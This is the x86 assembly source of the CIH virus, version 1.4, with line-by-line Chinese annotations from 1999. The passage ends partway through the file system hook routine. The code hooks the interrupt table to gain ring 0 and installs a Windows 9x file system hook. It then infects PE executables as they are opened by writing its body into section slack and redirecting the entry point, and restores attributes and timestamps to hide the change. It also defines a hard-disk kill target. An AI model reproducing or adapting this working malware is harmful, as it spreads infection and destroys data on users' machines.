CIH病毒-邹丹注释
;CIH病毒1.4版本之中文注釋由"鄒丹"編寫完成于1999-4-09
;源程序中的英文注釋未作修改,全部保留
.586P ;586保護模式匯編
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT FileHeader: ;編譯連接后的PE格式可執行文件文件頭 db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 
000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; ****************************************************************************
; * My Virus Game *
; **************************************************************************** ; *********************************************************
; * Constant Define *
; ********************************************************* TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1 ;主版本號
MinorVirusVersion = 4 ;副版本號
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本號 IF DEBUG ;是否是調試用 FirstKillHardDiskNumber = 81h ;殺掉第二個硬盤“d:” HookExceptionNumber = 05h ;使用5號中斷
ELSE FirstKillHardDiskNumber = 80h ;殺掉第一個硬盤“c:” HookExceptionNumber = 03h ;使用3號中斷
ENDIF FileNameBufferSize = 7fh ; *********************************************************
; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; *********************************************************
; * Ring3 Virus Game Initial Program *
; ********************************************************* MyVirusStart: push ebp ; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0
@0: pop ebx ;獲取程序起始偏移量? ;用此偏移量+相對偏移量獲得絕對地址(病毒程序大量用到) lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address ?;獲得中斷描述符表的基址到ebx pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;計算要用中斷的基址到ebx cli ;在改表項前關中斷? mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point ?;取得中斷基址到ebp lea esi, MyExceptionHook-@1[ecx] push esi ?;esi為病毒中斷例程地址 mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address;修改中斷基址使指向病毒中斷例程 pop esi ; *************************************
; * Generate Exception to Get Ring0 *
; ************************************* int HookExceptionNumber ; GenerateException;以中斷的方式進入0級
ReturnAddressOfEndException = $ ; *************************************
; * Merge All Virus Code Section *
; ************************************* push esi mov esi, eax ;esi指向病毒開始處 LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb ;拷貝病毒代碼到分配好的系統內存首址 sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷貝結束 jmp LoopOfMergeAllVirusCodeSection ;拷貝下一段 QuitLoopOfMergeAllVirusCodeSection: pop esi ; *************************************
; * Generate Exception Again *
; ************************************* int HookExceptionNumber ; GenerateException Aga ;再一次進入0級 ; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; ************************************* ReadyRestoreSE: sti ;開中斷 xor ebx, ebx jmp RestoreSE ; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; ************************************* StopToRunVirusCode:
@1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; *************************************
; * Return Original App to Execute *
; ************************************* pop ebp push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ;把原程序的開始地址壓棧 ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的開始處 ; *********************************************************
; * Ring0 Virus Game Initial Program *
; ********************************************************* MyExceptionHook:
@2 = MyExceptionHook jz InstallMyFileSystemApiHook ;如果病毒代碼已拷貝好了 ;轉到安裝文件系統鉤子的程序
; *************************************
; * Do My Virus Exist in System !? *
; ************************************* mov ecx, dr0 ;察看dr0是否設置過(dr0為病毒駐留標志) jecxz AllocateSystemMemoryPage ;沒有設置,則分配系統內存 add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; *************************************
; * Return to Ring3 Initial Program *
; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; ;恢復原來的中斷基址 iretd ;中斷返回 ; *************************************
; * Allocate SystemMemory Page to Use *
; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System ;設置dr0,它是病毒駐留的標志 push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ;調用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,;ULONG flags); push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate;VXD調用
_PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h ;恢復棧指針 xchg edi, eax ; EDI = SystemMemory Start Address ; EDI指向分配好的系統內存首址 lea eax, MyVirusStart-@2[esi] ;eax指向病毒開始處 iretd ; Return to Ring3 Initial Program ;退出中斷,回3級(回到"Merge All Virus Code Section") ; *************************************
; * Install My File System Api Hook *
; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] ;指向文件系統鉤子程序首址 push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags ;在調用后變為call [IFSMgr_InstallFileSystemApiHook] mov dr0, eax ; Save OldFileSystemApiHook Address ;保存原來的文件系統鉤子程序首址到dr0(改調用的返回值是前一個鏈值) pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] ;edx為IFSMgr_InstallFileSystemApiHook功能的地址 mov OldInstallFileSystemApiHook-@3[eax], edx ?;保存 ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax ?;設置新的IFSMgr_InstallFileSystemApiHook功能調用的地址 ;使指向InstallFileSystemApiHook cli jmp ExitRing0Init ?;退出0級(int 3 or int 5) ; *********************************************************
; * Code Size of Merge Virus Code Section *
; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; ********************************************************* InstallFileSystemApiHook: ;新的IFSMgr_InstallFileSystemApiHook功能調用 push ebx call @4 ;
@4: ; pop ebx ; mov ebx, offset FileSystemApiHook ;獲得當前指令的偏移地址 add ebx, FileSystemApiHook-@4 ;加上偏移的差=FileSystemApiHook的偏移 push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ;調用VXD移去指向FileSystemApiHook的鉤子
IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags ;調用號 pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] ;調用原來的IFSMgr_InstallFileSystemApiHook功能設置鉤子 pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] ;調用原來的IFSMgr_InstallFileSystemApiHook功能設置鉤子 pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address ;調整原來的地址 pop eax pop ebx ret ; *********************************************************
; * Static Data *
; ********************************************************* OldInstallFileSystemApiHook dd ? ;原來的InstallFileSystemApiHook調用的地址 ; *********************************************************
; * IFSMgr_FileSystemHook *
; ********************************************************* ; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; ************************************* FileSystemApiHook: ;安裝好的文件系統鉤子
@3 = FileSystemApiHook pushad ;保存寄存器(20h長) call @5 ;
@5: ; pop esi ; mov esi, offset ;esi為當前指令的偏移 add esi, VirusGameDataStartAddress-@5 ;esi為FileSystemApiHook的偏移加上到VirusGameDataStartAddress的偏移之差=VirusGameDataStartAddress的偏移; *************************************
; * Is OnBusy !? *
; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ;測試"忙"標志jnz pIFSFunc ; goto pIFSFunc ;"忙"則轉到pIFSFunc; *************************************
; * Is OpenFile !? *
; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] ;ebx為FunctionNum的地址
;文件系統鉤子的調用格式如下
;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,int ResourceFlags, int CodePage, pioreq pir);助標2 cmp dword ptr [ebx], 00000024h ;測試此次調用是否是為了打開文件;在DDK的ifs.h中定義的#define IFSFN_OPEN 36 jne prevhook ;不是就跳到前一個文件鉤子去 ; *************************************
; * Enable OnBusy *
; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;設置"忙"標志為"忙" ; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer push esi ;保存之 mov al, [ebx+04h] ;ebx+4為int Drive的地址 cmp al, 0ffh ;是否是UNC(universal naming conventions)地址 je CallUniToBCSPath ;是就轉 add al, 40h mov ah, ':' mov [esi], eax ;處理成"X:"的形式 inc esi inc esi ; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname * ;把Canonicalized Unicode的字符轉換為普通的BCS字符集
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
;調用方法 UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet)CallUniToBCSPath: push 00000000h ;字符集 push FileNameBufferSize ;字符長度 mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax ;Uni字符首址 push esi ;BCS字符首址 int 20h ; VXDCall UniToBCSPath ;調用UniToBCSPath
UniToBCSPath = $ dd 00400041h ;調用id add esp, 04h*04h ; *************************************
; * Is FileName '.EXE' !? *
; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' ;測試是否是*.EXE(可執行)文件 pop esi jne DisableOnBusy IF DEBUG ; *************************************
; * Only for Debug *
; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' ;如果是測試用途則測試是否是"FUCK.EXE" jne DisableOnBusy ENDIF ; *************************************
; * Is Open Existing File !? *
; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h ;測試是否打開 jne DisableOnBusy ; *************************************
; * Get Attributes of the File *
; ************************************* mov ax, 4300h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(R0_FILEATTRIBUTES/GET_ATTRIBUTES) int 20h ; VXDCall IFSMgr_Ring0_FileIO ;調用IFSMgr_Ring0_FileIO的獲得文件屬性的功能
IFSMgr_Ring0_FileIO = $ dd 00400032h ;調用號 jc DisableOnBusy ;失敗否? push ecx ; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ;獲得IFSMgr_Ring0_FileIO調用的地址 ; *************************************
; * Is Read-Only File !? *
; ************************************* test cl, 01h jz OpenFile ;測試是否是只讀文件 ; *************************************
; * Modify Read-Only File to Write *
; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(R0_FILEATTRIBUTES/SET_ATTRIBUTES ) xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ;調用IFSMgr_Ring0_FileIO的改文件屬性功能,使文件可寫; *************************************
; * Open File *
; ************************************* OpenFile: xor eax, eax mov ah, 0d5h ;IFSMgr_Ring0_FileIO的打開文件功能號(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT)xor ecx, ecx ;文件屬性 xor edx, edx inc edx mov ebx, edx inc ebx ;esi為文件名首址 call edi ; VXDCall IFSMgr_Ring0_FileIO ;調用IFSMgr_Ring0_FileIO的打開文件功能 xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄 ; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ;是否需要恢復文件屬性(有寫屬性就不需要恢復了) ; *************************************
; * Restore Attributes of the File *
; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(R0_FILEATTRIBUTES/SET_ATTRIBUTES) call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢復文件屬性 ; *************************************
; * Is Open File OK !? *
; ************************************* IsOpenFileOK: popf jc DisableOnBusy ;打開是否成功? ; *************************************
; * Open File Already Succeed. ^__^ *
; ************************************* push esi ; Push FileNameBuffer Address to Stack ;把文件名數據區首址壓棧 pushf ; Now CF = 0, Push Flag to Stack ;保存標志位 add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向數據區首址 ; ***************************
; * Get OffsetToNewHeader *
; *************************** xor eax, eax mov ah, 0d6h ;IFSMgr_Ring0_FileIO的讀文件功能號(R0_READFILE) ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h ;讀取4個字節 pop ecx push 0000003ch ;讀取dos文件頭偏移3ch處的Windows文件頭首部偏移 pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi mov edx, [esi] ;Windows文件頭首部偏移放到edx ; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; *************************** dec edx mov eax, ebp ;功能號 call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi ; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h ;判斷是否是PE文件(標志"PE\0\0") jne CloseFile ;不是就關閉文件 ; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; ************************************* ; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; ************************************* push ebx ; Save File Handle ;保存文件句柄 push 00h ; Set VirusCodeSectionTableEndMark ; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; *************************** push 01h ; Size push edx ; Pointer of File ;edx指向PE文件頭偏移00h push edi ; Address of Buffer ;edi為IFSMgr_Ring0_FileIO的地址(原注釋有誤) ; ***************************
; * Save ESP Register *
; *************************** mov dr1, esp ; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; *************************** push eax ; Size ; ***************************
; * Let's Read *
; * Image Header in File *
; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead ;要讀2個字節(WORD NumberOfSections) add edx, 07h ; Move EDX to NumberOfSections ;PE文件頭+07h為NumberOfSections(塊個數) call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀出NumberOfSections(塊個數)到esi ; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ;edx為SectionTable的偏移 ; ***************************
; * Let's Get *
; * Total Size of Sections *
; *************************** mov al, SizeOfScetionTable ;每個塊表項(ScetionTable)的大小(字節) ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ;每個塊表項乘以塊個數=塊表大小 ; ***************************
; * Let's Set Section Table *
; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] ;esi指向塊表首址(在病毒動態數據區中) push eax ; Size ;塊表大小 push edx ; Pointer of File ;edx為SectionTable的偏移 push esi ; Address of Buffer ; ; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h ;*8 push ecx ; Save TotalSizeOfVirusCodeSectionTable ;預留病毒塊表空間 add ecx, eax add ecx, edx ;ecx+文件的正文的偏移 sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ;求補 ;ecx為文件頭大小-正文的偏移=未用空間 ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ;ecx為塊表大小 ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 add eax, (ImageBase-@9)[esi] ;裝入基址 mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存裝入后實際的入口地址 cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空間和病毒第一塊大小比較jl OnlySetInfectedMark ;小于就只設感染標志; ***************************
; * Read All Section Tables *
; *************************** mov eax, ebp ;讀的功能號 call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀塊表到esi(@9處) ; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; *************************** xchg eax, ebp push 00000004h pop ecx ;讀4字節 push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx為第二塊的偏移(.rdata) add edx, 12h ;加10h+2h(10h處為"WinZip....") call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀4字節到esi ; cmp [esi], 'nZip' cmp dword ptr [esi], 'piZn' ;判斷是否是WinZip自解壓文件 je NotSetInfectedMark ;是就不設置感染標志 pop edx ;edx指向塊表在文件中首址 ; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx ; 未用空間大小 pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp ; ebp為塊表大小 push edx ; Pointer of File ;指向塊表后(第一塊) add ebp, esi ; ebp指向病毒數據區的塊表后(第一塊) push ebp ; Address of Buffer ; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ;設置病毒代碼第一塊的大小(未用空間大小)到病毒塊表 ; ***************************
; * Let's Set My Virus *
; * First Section Code *
; *************************** push ebx ; Size ;病毒代碼第一塊的大小(未用空間大小) add edx, edi push edx ; Pointer of File ;指向塊表后(第一塊)+Size??=病毒正文(病毒開始處) lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ;指向病毒開始處 ; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) ; ***************************
; * Setup Initial Data *
; *************************** lea edx, [esi-SizeOfScetionTable] ;edx先減一項塊表長度,以配合下面的"助標1"mov ebp, offset VirusSize ;ebp為病毒長度 jmp StartToWriteCodeToSections ; ***************************
; * Write Code to Sections *
; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable ;助標1: ;指向下一塊表項 mov ebx, (SizeOfRawData-@9)[edx] ;ebx為該塊表項的SizeOfRawData(塊大小) sub ebx, (VirtualSize-@9)[edx] ;減去VirtualSize=該塊未用空間 jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx ;寫入病毒塊表 mov ebx, (PointerToRawData-@9)[edx] ;ebx為塊的物理(實際)偏移? add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize push ebx ; Pointer of File ;ebx指向該塊未用空間的文件指針 push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] ;ebx為該塊裝入后的實際地址 mov [eax+4], ebx ;保存到病毒塊表中 mov ebx, [eax] ;該塊未用空間大小 add (VirtualSize-@9)[edx], ebx ;加到該塊表項的VirtualSize; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h ;改該塊表項的塊屬性(改為可讀,并包含初始化數據) StartToWriteCodeToSections: sub ebp, ebx ;病毒大小-病毒塊大小 jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完畢)就設置病毒塊表結束符add edi, ebx ; Move Address of Buffer ;指向病毒下一塊 EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; ***************************
; * Only Set Infected Mark *
; *************************** OnlySetInfectedMark: mov esp, dr1 ;只設置感染標志 jmp WriteVirusCodeToFile ;跳到寫病毒到要傳染的文件的程序 ; ***************************
; * Not Set Infected Mark *
; *************************** NotSetInfectedMark: add esp, 3ch ;不設置感染標志 jmp CloseFile ;跳到關文件 ; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp ;更正病毒塊表的最后一項 add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ;設置塊表結束標志 ; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] ;上一個調用VXD的指令的地址 mov cl, VxDCallTableSize ;所用VXD調用的個數 LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh ;還原成"int 20h"的形式 mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ;從VxDCallIDTable取出VXD調用的id號放到edxmov [eax+2], edx ;放到"int 20h"的后面,形成'int 20h' and the 'Service Identifier'的形式movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ;VxDCallAddressTable中放著各個調用VXD的指令的地址之差sub eax, edx ;eax為上一個調用地址 loop LoopOfRestoreVxDCallID ;還原其他的調用 ; ***************************
; * Let's Write *
; * Virus Code to the File *
; *************************** WriteVirusCodeToFile: mov eax, dr1 ;dr1為前面所保存的esp mov ebx, [eax+10h] ;ebx為保存在棧中的保存文件句柄mov edi, [eax] ;edi為保存在棧中的IFSMgr_Ring0_FileIO調用的地址LoopOfWriteVirusCodeToFile: pop ecx ;病毒代碼各段的偏移 jecxz SetFileModificationMark ;到病毒偏移零為止 mov esi, ecx mov eax, 0d601h ;寫文件功能號(R0_WRITEFILE) pop edx ;文件指針 pop ecx ;要寫的字節數call edi ; VXDCall IFSMgr_Ring0_FileIO ;寫文件 ;依次寫入:各段病毒代碼,病毒塊表,新的文件塊表,新的程序入口,感染標志 jmp LoopOfWriteVirusCodeToFile ; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) ;設置進位標志 pushf ;標志位壓棧 ; *************************************
; * Close File *
; ************************************* CloseFile: xor eax, eax mov ah, 0d7h ;關閉文件功能號 call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************************
; * Need to Restore File Modification *
; * Time !? *
; ************************************* popf pop esi jnc IsKillComputer ;CF=0就KillComputer :-( ; *************************************
; * Restore File Modification Time *
; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ;修改文件修改時間 ; *************************************
; * Disable OnBusy *
; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus ; *************************************
; * Call Previous FileSystemApiHook *
